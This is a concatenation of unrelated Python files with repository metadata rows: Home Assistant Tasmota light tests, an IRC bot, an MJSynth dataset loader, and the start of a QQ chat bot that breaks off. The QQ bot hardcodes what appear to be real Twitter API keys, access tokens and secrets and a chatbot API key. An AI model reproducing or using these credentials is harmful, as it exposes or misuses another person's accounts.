config["lt_st"] = 2 # 2 channel light (CT)
mac = config["mac"]
async_fire_mqtt_message(
hass,
f"{DEFAULT_PREFIX}/{mac}/config",
json.dumps(config),
)
await hass.async_block_till_done()
state = hass.states.get("light.test")
assert state.state == "unavailable"
assert not state.attributes.get(ATTR_ASSUMED_STATE)
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online")
state = hass.states.get("light.test")
assert state.state == STATE_OFF
assert not state.attributes.get(ATTR_ASSUMED_STATE)
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON"}')
state = hass.states.get("light.test")
assert state.state == STATE_ON
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"OFF"}')
state = hass.states.get("light.test")
assert state.state == STATE_OFF
async_fire_mqtt_message(
hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON","Dimmer":50}'
)
state = hass.states.get("light.test")
assert state.state == STATE_ON
assert state.attributes.get("brightness") == 127.5
async_fire_mqtt_message(
hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON","CT":300}'
)
state = hass.states.get("light.test")
assert state.state == STATE_ON
assert state.attributes.get("color_temp") == 300
# Tasmota will send "Color" also for CT light, this should be ignored
async_fire_mqtt_message(
hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON","Color":"255,128"}'
)
state = hass.states.get("light.test")
assert state.state == STATE_ON
assert state.attributes.get("color_temp") == 300
assert state.attributes.get("brightness") == 127.5
async def test_controlling_state_via_mqtt_rgbww(hass, mqtt_mock, setup_tasmota):
"""Test state update via MQTT."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 2
config["lt_st"] = 5 # 5 channel light (RGBCW)
mac = config["mac"]
async_fire_mqtt_message(
hass,
f"{DEFAULT_PREFIX}/{mac}/config",
json.dumps(config),
)
await hass.async_block_till_done()
state = hass.states.get("light.test")
assert state.state == "unavailable"
assert not state.attributes.get(ATTR_ASSUMED_STATE)
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online")
state = hass.states.get("light.test")
assert state.state == STATE_OFF
assert not state.attributes.get(ATTR_ASSUMED_STATE)
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON"}')
state = hass.states.get("light.test")
assert state.state == STATE_ON
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"OFF"}')
state = hass.states.get("light.test")
assert state.state == STATE_OFF
async_fire_mqtt_message(
hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON","Dimmer":50}'
)
state = hass.states.get("light.test")
assert state.state == STATE_ON
assert state.attributes.get("brightness") == 127.5
async_fire_mqtt_message(
hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON","Color":"255,128,0"}'
)
state = hass.states.get("light.test")
assert state.state == STATE_ON
assert state.attributes.get("rgb_color") == (255, 128, 0)
async_fire_mqtt_message(
hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON","White":50}'
)
state = hass.states.get("light.test")
assert state.state == STATE_ON
assert state.attributes.get("white_value") == 127.5
# Setting white > 0 should clear the color
assert not state.attributes.get("rgb_color")
async_fire_mqtt_message(
hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON","CT":300}'
)
state = hass.states.get("light.test")
assert state.state == STATE_ON
assert state.attributes.get("color_temp") == 300
async_fire_mqtt_message(
hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON","White":0}'
)
state = hass.states.get("light.test")
assert state.state == STATE_ON
# Setting white to 0 should clear the white_value and color_temp
assert not state.attributes.get("white_value")
assert not state.attributes.get("color_temp")
async_fire_mqtt_message(
hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON","Scheme":3}'
)
state = hass.states.get("light.test")
assert state.state == STATE_ON
assert state.attributes.get("effect") == "Cycle down"
async_fire_mqtt_message(hass, "tasmota_49A3BC/stat/RESULT", '{"POWER":"ON"}')
state = hass.states.get("light.test")
assert state.state == STATE_ON
async_fire_mqtt_message(hass, "tasmota_49A3BC/stat/RESULT", '{"POWER":"OFF"}')
state = hass.states.get("light.test")
assert state.state == STATE_OFF
async def test_sending_mqtt_commands_on_off(hass, mqtt_mock, setup_tasmota):
"""Test the sending MQTT commands."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 1
config["so"]["30"] = 1 # Enforce Home Assistant auto-discovery as light
mac = config["mac"]
async_fire_mqtt_message(
hass,
f"{DEFAULT_PREFIX}/{mac}/config",
json.dumps(config),
)
await hass.async_block_till_done()
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online")
state = hass.states.get("light.test")
assert state.state == STATE_OFF
await hass.async_block_till_done()
await hass.async_block_till_done()
mqtt_mock.async_publish.reset_mock()
# Turn the light on and verify MQTT message is sent
await common.async_turn_on(hass, "light.test")
mqtt_mock.async_publish.assert_called_once_with(
"tasmota_49A3BC/cmnd/Power1", "ON", 0, False
)
mqtt_mock.async_publish.reset_mock()
# Tasmota is not optimistic, the state should still be off
state = hass.states.get("light.test")
assert state.state == STATE_OFF
# Turn the light off and verify MQTT message is sent
await common.async_turn_off(hass, "light.test")
mqtt_mock.async_publish.assert_called_once_with(
"tasmota_49A3BC/cmnd/Power1", "OFF", 0, False
)
mqtt_mock.async_publish.reset_mock()
async def test_sending_mqtt_commands_rgbww(hass, mqtt_mock, setup_tasmota):
"""Test the sending MQTT commands."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 2
config["lt_st"] = 5 # 5 channel light (RGBCW)
mac = config["mac"]
async_fire_mqtt_message(
hass,
f"{DEFAULT_PREFIX}/{mac}/config",
json.dumps(config),
)
await hass.async_block_till_done()
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online")
state = hass.states.get("light.test")
assert state.state == STATE_OFF
await hass.async_block_till_done()
await hass.async_block_till_done()
mqtt_mock.async_publish.reset_mock()
# Turn the light on and verify MQTT message is sent
await common.async_turn_on(hass, "light.test")
mqtt_mock.async_publish.assert_called_once_with(
"tasmota_49A3BC/cmnd/Backlog", "NoDelay;Fade 0;NoDelay;Power1 ON", 0, False
)
mqtt_mock.async_publish.reset_mock()
# Tasmota is not optimistic, the state should still be off
state = hass.states.get("light.test")
assert state.state == STATE_OFF
# Turn the light off and verify MQTT message is sent
await common.async_turn_off(hass, "light.test")
mqtt_mock.async_publish.assert_called_once_with(
"tasmota_49A3BC/cmnd/Backlog", "NoDelay;Fade 0;NoDelay;Power1 OFF", 0, False
)
mqtt_mock.async_publish.reset_mock()
# Turn the light on and verify MQTT messages are sent
await common.async_turn_on(hass, "light.test", brightness=192)
mqtt_mock.async_publish.assert_called_once_with(
"tasmota_49A3BC/cmnd/Backlog", "NoDelay;Fade 0;NoDelay;Dimmer 75", 0, False
)
mqtt_mock.async_publish.reset_mock()
await common.async_turn_on(hass, "light.test", rgb_color=[255, 128, 0])
mqtt_mock.async_publish.assert_called_once_with(
"tasmota_49A3BC/cmnd/Backlog",
"NoDelay;Fade 0;NoDelay;Power1 ON;NoDelay;Color2 255,128,0",
0,
False,
)
mqtt_mock.async_publish.reset_mock()
await common.async_turn_on(hass, "light.test", color_temp=200)
mqtt_mock.async_publish.assert_called_once_with(
"tasmota_49A3BC/cmnd/Backlog",
"NoDelay;Fade 0;NoDelay;Power1 ON;NoDelay;CT 200",
0,
False,
)
mqtt_mock.async_publish.reset_mock()
await common.async_turn_on(hass, "light.test", white_value=128)
mqtt_mock.async_publish.assert_called_once_with(
"tasmota_49A3BC/cmnd/Backlog",
"NoDelay;Fade 0;NoDelay;Power1 ON;NoDelay;White 50",
0,
False,
)
mqtt_mock.async_publish.reset_mock()
await common.async_turn_on(hass, "light.test", effect="Random")
mqtt_mock.async_publish.assert_called_once_with(
"tasmota_49A3BC/cmnd/Backlog",
"NoDelay;Fade 0;NoDelay;Power1 ON;NoDelay;Scheme 4",
0,
False,
)
mqtt_mock.async_publish.reset_mock()
async def test_sending_mqtt_commands_power_unlinked(hass, mqtt_mock, setup_tasmota):
"""Test the sending MQTT commands to a light with unlinked dimlevel and power."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 2
config["lt_st"] = 1 # 1 channel light (dimmer)
config["so"]["20"] = 1 # Update of Dimmer/Color/CT without turning power on
mac = config["mac"]
async_fire_mqtt_message(
hass,
f"{DEFAULT_PREFIX}/{mac}/config",
json.dumps(config),
)
await hass.async_block_till_done()
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online")
state = hass.states.get("light.test")
assert state.state == STATE_OFF
await hass.async_block_till_done()
await hass.async_block_till_done()
mqtt_mock.async_publish.reset_mock()
# Turn the light on and verify MQTT message is sent
await common.async_turn_on(hass, "light.test")
mqtt_mock.async_publish.assert_called_once_with(
"tasmota_49A3BC/cmnd/Backlog", "NoDelay;Fade 0;NoDelay;Power1 ON", 0, False
)
mqtt_mock.async_publish.reset_mock()
# Tasmota is not optimistic, the state should still be off
state = hass.states.get("light.test")
assert state.state == STATE_OFF
# Turn the light off and verify MQTT message is sent
await common.async_turn_off(hass, "light.test")
mqtt_mock.async_publish.assert_called_once_with(
"tasmota_49A3BC/cmnd/Backlog", "NoDelay;Fade 0;NoDelay;Power1 OFF", 0, False
)
mqtt_mock.async_publish.reset_mock()
# Turn the light on and verify MQTT messages are sent; POWER should be sent
await common.async_turn_on(hass, "light.test", brightness=192)
mqtt_mock.async_publish.assert_called_once_with(
"tasmota_49A3BC/cmnd/Backlog",
"NoDelay;Fade 0;NoDelay;Dimmer 75;NoDelay;Power1 ON",
0,
False,
)
mqtt_mock.async_publish.reset_mock()
async def test_transition(hass, mqtt_mock, setup_tasmota):
"""Test transition commands."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 2
config["lt_st"] = 5 # 5 channel light (RGBCW)
mac = config["mac"]
async_fire_mqtt_message(
hass,
f"{DEFAULT_PREFIX}/{mac}/config",
json.dumps(config),
)
await hass.async_block_till_done()
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online")
state = hass.states.get("light.test")
assert state.state == STATE_OFF
await hass.async_block_till_done()
await hass.async_block_till_done()
mqtt_mock.async_publish.reset_mock()
# Dim the light from 0->100: Speed should be 4*2=8
await common.async_turn_on(hass, "light.test", brightness=255, transition=4)
mqtt_mock.async_publish.assert_called_once_with(
"tasmota_49A3BC/cmnd/Backlog",
"NoDelay;Fade 1;NoDelay;Speed 8;NoDelay;Dimmer 100",
0,
False,
)
mqtt_mock.async_publish.reset_mock()
# Dim the light from 0->50: Speed should be 4*2/2=4
await common.async_turn_on(hass, "light.test", brightness=128, transition=4)
mqtt_mock.async_publish.assert_called_once_with(
"tasmota_49A3BC/cmnd/Backlog",
"NoDelay;Fade 1;NoDelay;Speed 4;NoDelay;Dimmer 50",
0,
False,
)
mqtt_mock.async_publish.reset_mock()
# Fake state update from the light
async_fire_mqtt_message(
hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON","Dimmer":50}'
)
state = hass.states.get("light.test")
assert state.state == STATE_ON
assert state.attributes.get("brightness") == 127.5
# Dim the light from 50->0: Speed should be 6*2/2=6
await common.async_turn_off(hass, "light.test", transition=6)
mqtt_mock.async_publish.assert_called_once_with(
"tasmota_49A3BC/cmnd/Backlog",
"NoDelay;Fade 1;NoDelay;Speed 6;NoDelay;Power1 OFF",
0,
False,
)
mqtt_mock.async_publish.reset_mock()
async def test_relay_as_light(hass, mqtt_mock, setup_tasmota):
"""Test relay show up as light in light mode."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 1
config["so"]["30"] = 1 # Enforce Home Assistant auto-discovery as light
mac = config["mac"]
async_fire_mqtt_message(
hass,
f"{DEFAULT_PREFIX}/{mac}/config",
json.dumps(config),
)
await hass.async_block_till_done()
state = hass.states.get("switch.test")
assert state is None
state = hass.states.get("light.test")
assert state is not None
async def _test_split_light(hass, mqtt_mock, config, num_lights, num_switches):
"""Test multi-channel light split to single-channel dimmers."""
mac = config["mac"]
async_fire_mqtt_message(
hass,
f"{DEFAULT_PREFIX}/{mac}/config",
json.dumps(config),
)
await hass.async_block_till_done()
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online")
await hass.async_block_till_done()
await hass.async_block_till_done()
assert len(hass.states.async_entity_ids("switch")) == num_switches
assert len(hass.states.async_entity_ids("light")) == num_lights
lights = hass.states.async_entity_ids("light")
for idx, entity in enumerate(lights):
mqtt_mock.async_publish.reset_mock()
# Turn the light on and verify MQTT message is sent
await common.async_turn_on(hass, entity)
mqtt_mock.async_publish.assert_called_once_with(
"tasmota_49A3BC/cmnd/Backlog",
f"NoDelay;Fade 0;NoDelay;Power{idx+num_switches+1} ON",
0,
False,
)
mqtt_mock.async_publish.reset_mock()
# Dim the light and verify MQTT message is sent
await common.async_turn_on(hass, entity, brightness=(idx + 1) * 25.5)
mqtt_mock.async_publish.assert_called_once_with(
"tasmota_49A3BC/cmnd/Backlog",
f"NoDelay;Fade 0;NoDelay;Channel{idx+num_switches+1} {(idx+1)*10}",
0,
False,
)
async def test_split_light(hass, mqtt_mock, setup_tasmota):
"""Test multi-channel light split to single-channel dimmers."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 2
config["rl"][1] = 2
config["rl"][2] = 2
config["rl"][3] = 2
config["rl"][4] = 2
config["so"][68] = 1 # Multi-channel PWM instead of a single light
config["lt_st"] = 5 # 5 channel light (RGBCW)
await _test_split_light(hass, mqtt_mock, config, 5, 0)
async def test_split_light2(hass, mqtt_mock, setup_tasmota):
"""Test multi-channel light split to single-channel dimmers."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 1
config["rl"][1] = 1
config["rl"][2] = 2
config["rl"][3] = 2
config["rl"][4] = 2
config["rl"][5] = 2
config["rl"][6] = 2
config["so"][68] = 1 # Multi-channel PWM instead of a single light
config["lt_st"] = 5 # 5 channel light (RGBCW)
await _test_split_light(hass, mqtt_mock, config, 5, 2)
async def _test_unlinked_light(hass, mqtt_mock, config, num_switches):
"""Test rgbww light split to rgb+ww."""
mac = config["mac"]
num_lights = 2
async_fire_mqtt_message(
hass,
f"{DEFAULT_PREFIX}/{mac}/config",
json.dumps(config),
)
await hass.async_block_till_done()
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online")
await hass.async_block_till_done()
await hass.async_block_till_done()
assert len(hass.states.async_entity_ids("switch")) == num_switches
assert len(hass.states.async_entity_ids("light")) == num_lights
lights = hass.states.async_entity_ids("light")
for idx, entity in enumerate(lights):
mqtt_mock.async_publish.reset_mock()
# Turn the light on and verify MQTT message is sent
await common.async_turn_on(hass, entity)
mqtt_mock.async_publish.assert_called_once_with(
"tasmota_49A3BC/cmnd/Backlog",
f"NoDelay;Fade 0;NoDelay;Power{idx+num_switches+1} ON",
0,
False,
)
mqtt_mock.async_publish.reset_mock()
# Dim the light and verify MQTT message is sent
await common.async_turn_on(hass, entity, brightness=(idx + 1) * 25.5)
mqtt_mock.async_publish.assert_called_once_with(
"tasmota_49A3BC/cmnd/Backlog",
f"NoDelay;Fade 0;NoDelay;Dimmer{idx+1} {(idx+1)*10}",
0,
False,
)
async def test_unlinked_light(hass, mqtt_mock, setup_tasmota):
"""Test rgbww light split to rgb+ww."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 2
config["rl"][1] = 2
config["lk"] = 0 # RGB + white channels unlinked
config["lt_st"] = 5 # 5 channel light (RGBCW)
await _test_unlinked_light(hass, mqtt_mock, config, 0)
async def test_unlinked_light2(hass, mqtt_mock, setup_tasmota):
"""Test rgbww light split to rgb+ww."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 1
config["rl"][1] = 1
config["rl"][2] = 2
config["rl"][3] = 2
config["lk"] = 0 # RGB + white channels unlinked
config["lt_st"] = 5 # 5 channel light (RGBCW)
await _test_unlinked_light(hass, mqtt_mock, config, 2)
async def test_discovery_update_reconfigure_light(
hass, mqtt_mock, caplog, setup_tasmota
):
"""Test reconfigure of discovered light."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 2
config["lt_st"] = 1 # 1 channel light (Dimmer)
config2 = copy.deepcopy(DEFAULT_CONFIG)
config2["rl"][0] = 2
config2["lt_st"] = 3 # 3 channel light (RGB)
data1 = json.dumps(config)
data2 = json.dumps(config2)
# Simple dimmer
async_fire_mqtt_message(hass, f"{DEFAULT_PREFIX}/{config[CONF_MAC]}/config", data1)
await hass.async_block_till_done()
state = hass.states.get("light.test")
assert (
state.attributes.get("supported_features")
== SUPPORT_BRIGHTNESS | SUPPORT_TRANSITION
)
# Reconfigure as RGB light
async_fire_mqtt_message(hass, f"{DEFAULT_PREFIX}/{config[CONF_MAC]}/config", data2)
await hass.async_block_till_done()
state = hass.states.get("light.test")
assert (
state.attributes.get("supported_features")
== SUPPORT_BRIGHTNESS | SUPPORT_COLOR | SUPPORT_EFFECT | SUPPORT_TRANSITION
)
async def test_availability_when_connection_lost(
hass, mqtt_client_mock, mqtt_mock, setup_tasmota
):
"""Test availability after MQTT disconnection."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 2
config["lt_st"] = 1 # 1 channel light (Dimmer)
await help_test_availability_when_connection_lost(
hass, mqtt_client_mock, mqtt_mock, light.DOMAIN, config
)
async def test_availability(hass, mqtt_mock, setup_tasmota):
"""Test availability."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 2
config["lt_st"] = 1 # 1 channel light (Dimmer)
await help_test_availability(hass, mqtt_mock, light.DOMAIN, config)
async def test_availability_discovery_update(hass, mqtt_mock, setup_tasmota):
"""Test availability discovery update."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 2
config["lt_st"] = 1 # 1 channel light (Dimmer)
await help_test_availability_discovery_update(hass, mqtt_mock, light.DOMAIN, config)
async def test_availability_poll_state(
hass, mqtt_client_mock, mqtt_mock, setup_tasmota
):
"""Test polling after MQTT connection (re)established."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 2
config["lt_st"] = 1 # 1 channel light (Dimmer)
poll_topic = "tasmota_49A3BC/cmnd/STATE"
await help_test_availability_poll_state(
hass, mqtt_client_mock, mqtt_mock, light.DOMAIN, config, poll_topic, ""
)
async def test_discovery_removal_light(hass, mqtt_mock, caplog, setup_tasmota):
"""Test removal of discovered light."""
config1 = copy.deepcopy(DEFAULT_CONFIG)
config1["rl"][0] = 2
config1["lt_st"] = 1 # 1 channel light (Dimmer)
config2 = copy.deepcopy(DEFAULT_CONFIG)
config2["rl"][0] = 0
config2["lt_st"] = 0
await help_test_discovery_removal(
hass, mqtt_mock, caplog, light.DOMAIN, config1, config2
)
async def test_discovery_removal_relay_as_light(hass, mqtt_mock, caplog, setup_tasmota):
"""Test removal of discovered relay as light."""
config1 = copy.deepcopy(DEFAULT_CONFIG)
config1["rl"][0] = 1
config1["so"]["30"] = 1 # Enforce Home Assistant auto-discovery as light
config2 = copy.deepcopy(DEFAULT_CONFIG)
config2["rl"][0] = 1
config2["so"]["30"] = 0 # Disable Home Assistant auto-discovery as light
await help_test_discovery_removal(
hass, mqtt_mock, caplog, light.DOMAIN, config1, config2
)
async def test_discovery_removal_relay_as_light2(
hass, mqtt_mock, caplog, setup_tasmota
):
"""Test removal of discovered relay as light."""
config1 = copy.deepcopy(DEFAULT_CONFIG)
config1["rl"][0] = 1
config1["so"]["30"] = 1 # Enforce Home Assistant auto-discovery as light
config2 = copy.deepcopy(DEFAULT_CONFIG)
config2["rl"][0] = 0
config2["so"]["30"] = 0 # Disable Home Assistant auto-discovery as light
await help_test_discovery_removal(
hass, mqtt_mock, caplog, light.DOMAIN, config1, config2
)
async def test_discovery_update_unchanged_light(hass, mqtt_mock, caplog, setup_tasmota):
"""Test update of discovered light."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 2
config["lt_st"] = 1 # 1 channel light (Dimmer)
with patch(
"homeassistant.components.tasmota.light.TasmotaLight.discovery_update"
) as discovery_update:
await help_test_discovery_update_unchanged(
hass, mqtt_mock, caplog, light.DOMAIN, config, discovery_update
)
async def test_discovery_device_remove(hass, mqtt_mock, setup_tasmota):
"""Test device registry remove."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 2
config["lt_st"] = 1 # 1 channel light (Dimmer)
unique_id = f"{DEFAULT_CONFIG['mac']}_light_light_0"
await help_test_discovery_device_remove(
hass, mqtt_mock, light.DOMAIN, unique_id, config
)
async def test_discovery_device_remove_relay_as_light(hass, mqtt_mock, setup_tasmota):
"""Test device registry remove."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 1
config["so"]["30"] = 1 # Enforce Home Assistant auto-discovery as light
unique_id = f"{DEFAULT_CONFIG['mac']}_light_relay_0"
await help_test_discovery_device_remove(
hass, mqtt_mock, light.DOMAIN, unique_id, config
)
async def test_entity_id_update_subscriptions(hass, mqtt_mock, setup_tasmota):
"""Test MQTT subscriptions are managed when entity_id is updated."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 2
config["lt_st"] = 1 # 1 channel light (Dimmer)
topics = [
get_topic_stat_result(config),
get_topic_tele_state(config),
get_topic_tele_will(config),
]
await help_test_entity_id_update_subscriptions(
hass, mqtt_mock, light.DOMAIN, config, topics
)
async def test_entity_id_update_discovery_update(hass, mqtt_mock, setup_tasmota):
"""Test MQTT discovery update when entity_id is updated."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 2
config["lt_st"] = 1 # 1 channel light (Dimmer)
await help_test_entity_id_update_discovery_update(
hass, mqtt_mock, light.DOMAIN, config
)
| apache-2.0 | 7,148,501,709,029,894,000 | 33.178399 | 88 | 0.642186 | false | 3.285714 | true | false | false |
asghaier/pynorcio | pynorcio.py | 1 | 2508 | #!/usr/bin/python
import sys
import socket
import string
import datetime
import config as config
class Pynorcio:
readbuffer = ""
s = ""
conf = ""
def __init__(self):
self.conf = config.Config()
self.connect()
def connect(self):
self.s = socket.socket()
self.s.connect((self.conf.HOST, self.conf.PORT))
self.s.send("NICK %s\r\n" % self.conf.NICK)
self.s.send("USER %s %s bla :%s\r\n" % (self.conf.IDENT, self.conf.HOST, self.conf.REALNAME))
for channel in self.conf.CHANNELS:
self.s.send("JOIN " + channel + "\r\n")
while 1:
self.readbuffer = self.readbuffer + self.s.recv(1024)
temp = string.split(self.readbuffer, "\n")
self.readbuffer = temp.pop( )
for line in temp:
msg = line
line = string.rstrip(line)
line = string.split(line)
if (line[0] == "PING"):
self.s.send("PONG %s\r\n" % line[1])
elif ( (line[1] == "PRIVMSG") and line[3].startswith(":" + self.conf.NICK) ):
self.read(line, msg)
def read(self, line, msg):
sndr = line[0][1:line[0].find("!")]
rcvr = line[2]
rply = ""
cmd = line[4]
to = ""
if (rcvr.startswith("#")):
to = rcvr
else:
to = sndr
if (cmd == "ping"):
self.write(to, self.query(line, msg))
elif (cmd == "whois"):
self.write(to, self.query(line, msg))
elif (cmd == "help"):
self.write(to, self.query(line, msg))
elif (cmd == "time"):
self.write(to, self.query(line, msg))
def write(self, to, output):
for line in output:
self.s.send("PRIVMSG " + to + " :" + line + "\r\n")
return ""
def query(self, line, msg):
sndr = line[0][1:line[0].find("!")]
rcvr = line[2]
cmd = line[4]
msg = msg[string.find(msg, ":", 1)+1:]
rply = []
eof = "\r\n"
if (cmd == "ping"):
return ["pong"]
elif (cmd == "whois"):
return ["My name is " + self.conf.REALNAME + ", and I am a python IRC bot."]
elif (cmd == "help"):
return [self.conf.NICK + " help command (commands : ping, whois)"]
elif (cmd == "time"):
return [datetime.datetime.now().time().isoformat()]
if __name__ == '__main__':
bot = Pynorcio()
| gpl-3.0 | 6,023,239,255,092,199,000 | 30.746835 | 101 | 0.480861 | false | 3.366443 | false | false | false |
mathDR/reading-text-in-the-wild | CHAR2/mjsynth_charnet.py | 1 | 4056 | # coding=utf-8
## Modified from https://github.com/tommasolevato/CNN-Classification/blob/master/mjsynth.py
from os.path import isfile
import logging
import numpy as np
import os.path
import matplotlib.image as mpimg
from skimage.transform import resize
np.random.seed(1)
class MJSYNTH_CHARNET():
classes = []
def __init__(self, which_set, numExamples):
self.output_char = [x for x in '0123456789abcdefghijklmnopqrstuvwxyz ']
self.space_hot = [0]*37
self.space_hot[-1] = 1
self.one_hot = [0]*37
self.height = 32
self.width = 100
self.examples = []
self.img_shape = (1, self.height, self.width)
self.numExamples = numExamples
self.which_set = which_set
if which_set == "train":
self.fileToLoadFrom = "annotation_train.txt"
elif which_set == "test":
self.fileToLoadFrom = "annotation_test.txt"
elif which_set == "valid":
self.fileToLoadFrom = "annotation_val.txt"
else:
raise ValueError("Set not recognized")
self.datapath = 'LOCATION OF SYNTH 90kDICT32px/ FOLDER'
self.loadData()
def findExamples(self):
with open(self.datapath + self.fileToLoadFrom) as f:
for line in f:
exampleClass = line.split(" ")[1].rstrip()
file = line.split(" ")[0].rstrip()
try:
self.examples.append(file[2:len(file)])
if len(self.examples) == self.numExamples:
break
except KeyError:
pass
def findOtherExamplesIfNeeded(self):
if len(self.examples) < self.numExamples:
with open(self.datapath + self.fileToLoadFrom) as f:
for line in f:
file = line.split(" ")[0].rstrip()
if file not in self.examples:
self.examples.append(file[2:len(file)])
if len(self.examples) == self.numExamples:
break
assert len(self.examples) == self.numExamples
def loadData(self):
self.findExamples()
self.findOtherExamplesIfNeeded()
self.loadImages()
def loadImages(self):
self.x = np.zeros((len(self.examples), 1, self.height, self.width), dtype=np.float32)
i = 0
tmp = []
for example in self.examples:
filename = self.datapath + example
self.x[i, :, :, :] = self.loadImage(filename)
classLabel = self.loadClassLabel(filename)
tmp.append(classLabel)
i += 1
self.labels = np.array(tmp)
def loadImage(self, filename):
if not isfile(filename):
print filename + "does not exist"
else:
img = mpimg.imread(filename)
if len(img.shape) == 3 and img.shape[2] == 3:
img = np.dot(img[...,:3], [0.2989, 0.5870, 0.1140]) # Convert to greyscale
im = resize(img, (32,100), order=1, preserve_range=True)
im = np.array(im,dtype=np.float32) # convert to single precision
img = (im - np.mean(im)) / ( (np.std(im) + 0.0001) )
return img
def loadClassLabel(self, filename):
word = (filename.split("_")[1]).lower()
#convert the word in the filename to a one-hot vector of length 37*23
classLabel = []
for i,c in enumerate(word):
ind = self.output_char.index(c)
tmp_hot = self.one_hot[:]
tmp_hot[ind] = 1
classLabel.extend(tmp_hot)
classLabel.extend((23-(i+1))*self.space_hot)
return classLabel
if __name__ == '__main__':
z = MJSYNTH_CHARNET("train",10)
output_char = [x for x in '0123456789abcdefghijklmnopqrstuvwxyz ']
for j in range(len(z.labels)):
y = z.labels[j]
for i in range(23):
c = np.where(y[i*37:(i+1)*37]==1)[0][0]
print output_char[c],
print ''
| gpl-3.0 | 2,037,932,847,618,101,800 | 34.269565 | 93 | 0.548077 | false | 3.773023 | false | false | false |
numerology/QQbot | main.py | 1 | 13776 | # -*- coding: utf-8 -*-
__author__ = 'Nilk'
from qqbot import QQBotSlot as qqbotslot, RunBot
import csv
import tweepy
import datetime
import os
import json
import urllib2
import sys
import re as regex
import time
import logging
from bs4 import BeautifulSoup as BS
reload(sys)
sys.setdefaultencoding('utf-8')
CONSUMER_KEY = 'uWb94m6mwDnHOix6YAfMQ1ESt'
CONSUMER_SECRET = 'AHOrZYDUvskktLFIQRvXxnN7hDxtkaW8PZQsg1AatQfNGvbczQ'
ACCESS_TOKEN = '1936186141-P1P8jBW8gwcLVMOW3kzeSOoF8GXvkyCPYvq4uB9'
ACCESS_TOKEN_SECRET = 'aLyYUHTYXkS4VHdI8Wvf49ydOOWYjMldGrMeFSMukeWuU'
TULINGKEY = "0a3727130d754c8d95797977f8f61646"
TULINGURL = "http://www.tuling123.com/openapi/api?"
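# Tuling (图灵) chatbot API credentials; only referenced by the
# commented-out auto-reply block inside onQQMessage below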
TIME_ONEDAY = datetime.timedelta(1)
KCWIKI_DATA = "http://kcwikizh.github.io/kcdata/slotitem/poi_improve.json"
GROUP_NUMBER = '337545621'
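# load keyword -> canned-reply pairs used by the chat handlers below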
with open('responses.csv', mode = 'r') as infile:
reader = csv.reader(infile)
responses = {rows[0]:rows[1] for rows in reader}
auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)
auth.set_access_token(ACCESS_TOKEN, ACCESS_TOKEN_SECRET)
api = tweepy.API(auth)
repCounter = 0
prevMsg = ''
logger = logging.getLogger('shoukaku')
hdlr = logging.FileHandler('shoukaku.log')
formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')
hdlr.setFormatter(formatter)
logger.addHandler(hdlr)
logger.setLevel(logging.INFO)
def tail(f, lines=20):
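    """Return the last `lines` lines of the open file object f.

    Reads the file backwards in BLOCK_SIZE chunks so that large log
    files do not have to be loaded into memory in full.
    """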
total_lines_wanted = lines
BLOCK_SIZE = 1024
f.seek(0, 2)
block_end_byte = f.tell()
lines_to_go = total_lines_wanted
block_number = -1
blocks = [] # blocks of size BLOCK_SIZE, in reverse order starting
# from the end of the file
while lines_to_go > 0 and block_end_byte > 0:
if (block_end_byte - BLOCK_SIZE > 0):
# read the last block we haven't yet read
f.seek(block_number*BLOCK_SIZE, 2)
blocks.append(f.read(BLOCK_SIZE))
else:
# file too small, start from begining
f.seek(0,0)
# only read what was not read
blocks.append(f.read(block_end_byte))
lines_found = blocks[-1].count('\n')
lines_to_go -= lines_found
block_end_byte -= BLOCK_SIZE
block_number -= 1
all_read_text = ''.join(reversed(blocks))
return '\n'.join(all_read_text.splitlines()[-total_lines_wanted:])
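
# Illustrative usage of tail() -- reads the last lines of the bot's own log:
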